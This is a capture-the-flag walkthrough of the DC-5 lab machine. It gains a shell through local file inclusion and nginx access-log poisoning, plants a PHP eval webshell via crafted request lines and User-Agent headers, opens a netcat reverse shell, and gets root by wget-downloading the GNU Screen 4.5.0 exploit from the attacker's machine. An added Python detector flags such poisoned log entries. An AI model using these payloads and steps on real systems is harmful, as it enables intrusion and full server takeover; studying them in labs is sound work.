DC-5 Walkthrough Notes
Topic: log file inclusion
nmap scan
┌──(kali㉿kali)-[~/Vulnhub/dc5]
└─$ nmap -sT --min-rate 10000 -p- 192.168.140.94 -oA nmapscan/ports
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-25 22:55 EDT
Nmap scan report for 192.168.140.94
Host is up (0.0021s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp    open  http
111/tcp   open  rpcbind
42496/tcp open  unknown   (42496 is a dynamically assigned RPC port belonging to rpc.statd, the NFS status service)
MAC Address: 08:00:27:A9:4A:3C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 130.00 seconds
┌──(kali㉿kali)-[~/Vulnhub/dc5]
└─$ nmap -sT -sC -sV -O -p80,111,42496 192.168.140.94 -oA nmapscan/detail
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-25 22:58 EDT
Nmap scan report for 192.168.140.94
Host is up (0.0017s latency).
PORT STATE SERVICE VERSION
80/tcp    open  http     nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Welcome
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo:
|   program  version    port/proto  service
|   100000   2,3,4      111/tcp     rpcbind
|   100000   2,3,4      111/udp     rpcbind
|   100000   3,4        111/tcp6    rpcbind
|   100000   3,4        111/udp6    rpcbind
|   100024   1        38651/tcp6    status
|   100024   1        42496/tcp     status
|   100024   1        49034/udp6    status
|_  100024   1        50944/udp     status
42496/tcp open  status   1 (RPC #100024)
MAC Address: 08:00:27:A9:4A:3C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop
┌──(kali㉿kali)-[~/Vulnhub/dc5]
└─$ nmap --script=vuln -p80,111,42496 192.168.140.94 -oA nmapscan/vuln
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-25 23:00 EDT
Nmap scan report for 192.168.140.94
Host is up (0.0012s latency).
PORT STATE SERVICE
80/tcp    open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.140.94
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.140.94:80/contact.php
| Form id: fname
|_ Form action: thankyou.php
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
111/tcp   open  rpcbind
42496/tcp open  unknown
MAC Address: 08:00:27:A9:4A:3C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 80.33 seconds
The scans did not turn up anything important.
Web
The VulnHub page for the box gives a hint:
As far as I am aware, there is only one exploitable entry point to get in
(there is no SSH either).
This particular entry point may be quite hard to identify, but it is there.
You need to look for something a little out of the ordinary
(something that changes with a refresh of a page).
This will hopefully provide some kind of idea as to what the vulnerability might involve.
And just for the record, there is no phpmailer exploit involved. :-)
Refreshing the front page, nothing changes.
contact.php has the only form that can be interacted with.
Fill in anything at all.
After submitting, it redirects to this URL:
http://192.168.140.94/thankyou.php?firstname=1&lastname=1&country=australia&subject=1
Refreshing this page, the year at the bottom changes.
Look at the source:
<footer>
Copyright © 2018 </footer>
In a PHP CMS (content management system) there is commonly a file called **footer.php** that manages the HTML at the bottom of the page (such as this tag).
MVC separation / template reuse is the design principle most CMSs (WordPress, ThinkPHP, Discuz, Drupal, Joomla and so on) follow. For maintainability the page structure is usually split into several parts, for example:

| File | Purpose |
| --- | --- |
| header.php | Page header content (e.g. …, navigation bar) |
| footer.php | Footer content (copyright, ICP filing number, scripts) |
| sidebar.php | Sidebar content |
| index.php | Home page logic |
| content.php | Main body content |

The HTML here already carries Copyright © 2018, so could a different year be getting pulled in through file inclusion (e.g. by including a footer.php)?
Check whether a footer.php exists in the same directory.
Its year changes on every refresh, which confirms the guess: there is very likely a file inclusion.
Fuzz this path to see whether it takes any other parameters:
wfuzz -u http://192.168.140.94/thankyou.php?FUZZ=test -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt --hh=851
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.140.94/thankyou.php?FUZZ=test
Total requests: 6453
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000002206: 200 42 L 63 W 835 Ch "file"
Total time: 0
Processed Requests: 6453
Filtered Requests: 6452
Requests/sec.: 0
A file parameter shows up; try setting it to index.php.
The file is included normally.
Try remote file inclusion.
It does not seem to be usable.
Test the values the inclusion accepts a little to see which useful files can be included.
**LFI-LFISuite-pathtotest-huge.txt** is the most comprehensive and largest list of sensitive file paths for LFI, suited to brute-forcing LFI paths.
Looking at that directory just now, none of the wordlists there seem to cover log files.
Test by hand whether log files can be included.
The earlier detailed nmap scan gave: 80/tcp open http nginx 1.6.2
Try including /var/log/nginx/access.log.
Included successfully.
Now a suitable request has to be built to see whether PHP written into the log gets included.
A few experiments:
1. Putting the webshell directly in the URL or in HackBar: the PHP in the log is not parsed; the log shows the URL-encoded webshell, in this form:
"GET /hahahhaha%3C?php%20@eval($_POST[%27a%27]);?%3E HTTP/1.1" 404 142
Sending a POST request straight from HackBar does not work either.
2. Put the PHP code in the "body" part of the log entry where possible, e.g. in header fields such as User-Agent, Referer or Cookie; that part is usually cleaner and is more readily interpreted by PHP when the log is included.
Tried it in HackBar's User-Agent: parsed successfully.
- "GET / HTTP/1.1" 200 1718 "-" "ooooooooops" 192.168.140.122
3. In Burp Suite, just put it directly in the request line:
GET / HTTP/1.1
Host: 192.168.140.94
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Change it to:
GET /OoOoOps<?php @eval($_POST['a']);?> HTTP/1.1
Host: 192.168.140.94
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Response:
"GET /OoOoOps HTTP/1.1" 404 200
A request in this form also parses successfully.
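As an added example that is not part of the original write-up, here is a small Python detector for the two things the LFI section and the log-poisoning experiments above describe: requests that pull a log file in through the file parameter, and access-log entries carrying PHP code in the request line, Referer or User-Agent. The nginx combined log format and the sample lines are assumptions constructed for the example; the request path is URL-decoded before matching because, as noted above, nginx writes the request line in encoded form.

```python
import re
from urllib.parse import unquote

# nginx "combined" log format (assumption: the target uses the default format).
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Markers of PHP code being written into the log (open tag or a dangerous call).
PHP_MARKER_RE = re.compile(r'<\?(php|=)|\b(eval|system|passthru|shell_exec)\s*\(', re.I)
# A file= parameter reaching into log or system directories, or traversing upward.
LFI_RE = re.compile(r'[?&]file=[^ &]*(/var/log/|/etc/|\.\./)', re.I)


def suspicious_fields(line):
    """Return the names of the fields that look malicious, or [] for a clean line.
    Each field is checked raw and URL-decoded: '%3C?php' in the log is still
    '<?php' to a later include()."""
    m = COMBINED_RE.match(line)
    if not m:
        return ["unparsed"]
    hits = []
    for field in ("request", "referer", "ua"):
        value = m.group(field)
        if PHP_MARKER_RE.search(value) or PHP_MARKER_RE.search(unquote(value)):
            hits.append(field)
    if LFI_RE.search(unquote(m.group("request"))):
        hits.append("lfi")
    return hits


def scan_log(lines):
    """Return (line_number, fields) for every suspicious line."""
    return [(i, f) for i, line in enumerate(lines, 1) if (f := suspicious_fields(line))]


# Constructed sample lines modelled on the log entries shown in the write-up.
SAMPLE_LOG = [
    '192.168.140.122 - - [26/Jul/2025:14:30:01 +0000] "GET / HTTP/1.1" 200 1718 "-" "Mozilla/5.0"',
    '192.168.140.122 - - [26/Jul/2025:14:30:05 +0000] "GET /hahahhaha%3C?php%20@eval($_POST[%27a%27]);?%3E HTTP/1.1" 404 142 "-" "Mozilla/5.0"',
    '192.168.140.122 - - [26/Jul/2025:14:30:09 +0000] "GET / HTTP/1.1" 200 1718 "-" "<?php @eval($_POST[\'a\']);?>"',
    '192.168.140.122 - - [26/Jul/2025:14:30:12 +0000] "GET /thankyou.php?file=/var/log/nginx/access.log HTTP/1.1" 200 835 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, fields in scan_log(SAMPLE_LOG):
        print(f"line {n}: suspicious ({', '.join(fields)})")
```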
Connect with AntSword.
Connection succeeded.
Spawn a reverse shell from AntSword's virtual terminal.
Privilege escalation
┌──(kali㉿kali)-
└─$ nc -lvnp 1234
listening on 1234 ...
connect to from (UNKNOWN) 49702
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ sudo -l
/bin/sh: 2: sudo: not found
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/at
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/sbin/mount.nfs
$
Among the SUID binaries this one is interesting, and it even gives a version: /bin/screen-4.5.0
searchsploit:
┌──(kali㉿kali)-[~/Vulnhub/dc5]
└─$ searchsploit screen 4.5.0
---------------------------------------------------- ---------------------------------
Exploit Title |Path
---------------------------------------------------- ---------------------------------
GNU Screen 4.5.0 - Local Privilege Escalation | linux/local/41154.sh
GNU Screen 4.5.0 - Local Privilege Escalation (PoC) | linux/local/41152.txt
---------------------------------------------------- ---------------------------------
Shellcodes: No Results
Copy this script:
┌──(kali㉿kali)-[~/Vulnhub/dc5]
└─$ searchsploit screen -m 41154
[!] Could not find EDB-ID #
Exploit: GNU Screen 4.5.0 - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/41154
Path: /usr/share/exploitdb/exploits/linux/local/41154.sh
Codes: N/A
Verified: True
File Type: Bourne-Again shell script, ASCII text executable
Copied to: /home/kali/Vulnhub/dc5/41154.sh
┌──(kali㉿kali)-[~/Vulnhub/dc5]
└─$ php -S 0:80
PHP 8.4.4 Development Server (http://0:80) started
192.168.140.94:44684 Accepted
192.168.140.94:44684 : GET /41154.sh
192.168.140.94:44684 Closing
$ cd /tmp
$ ls
f
$ wget http://192.168.140.200/41154.sh
converted 'http://192.168.140.200/41154.sh' (ANSI_X3.4-1968) -> 'http://192.168.140.200/41154.sh' (UTF-8)
--2025-07-26 14:49:44--http://192.168.140.200/41154.sh
Connecting to 192.168.140.200:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1149 (1.1K)
Saving to: '41154.sh'
0K . 100% 64.8M=0s
2025-07-26 14:49:44 (64.8 MB/s) - '41154.sh' saved
$ ls
41154.sh
f
$ chmod +x 41154.sh
$ ./41154.sh
~ gnu/screenroot ~
[+] First, we create our shell and library...
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
whoami
root
cd /root
ls
thisistheflag.txt
cat thisistheflag.txt
[ASCII-art banner from thisistheflag.txt omitted]
Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated.:-)
I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.
Privilege escalation succeeded.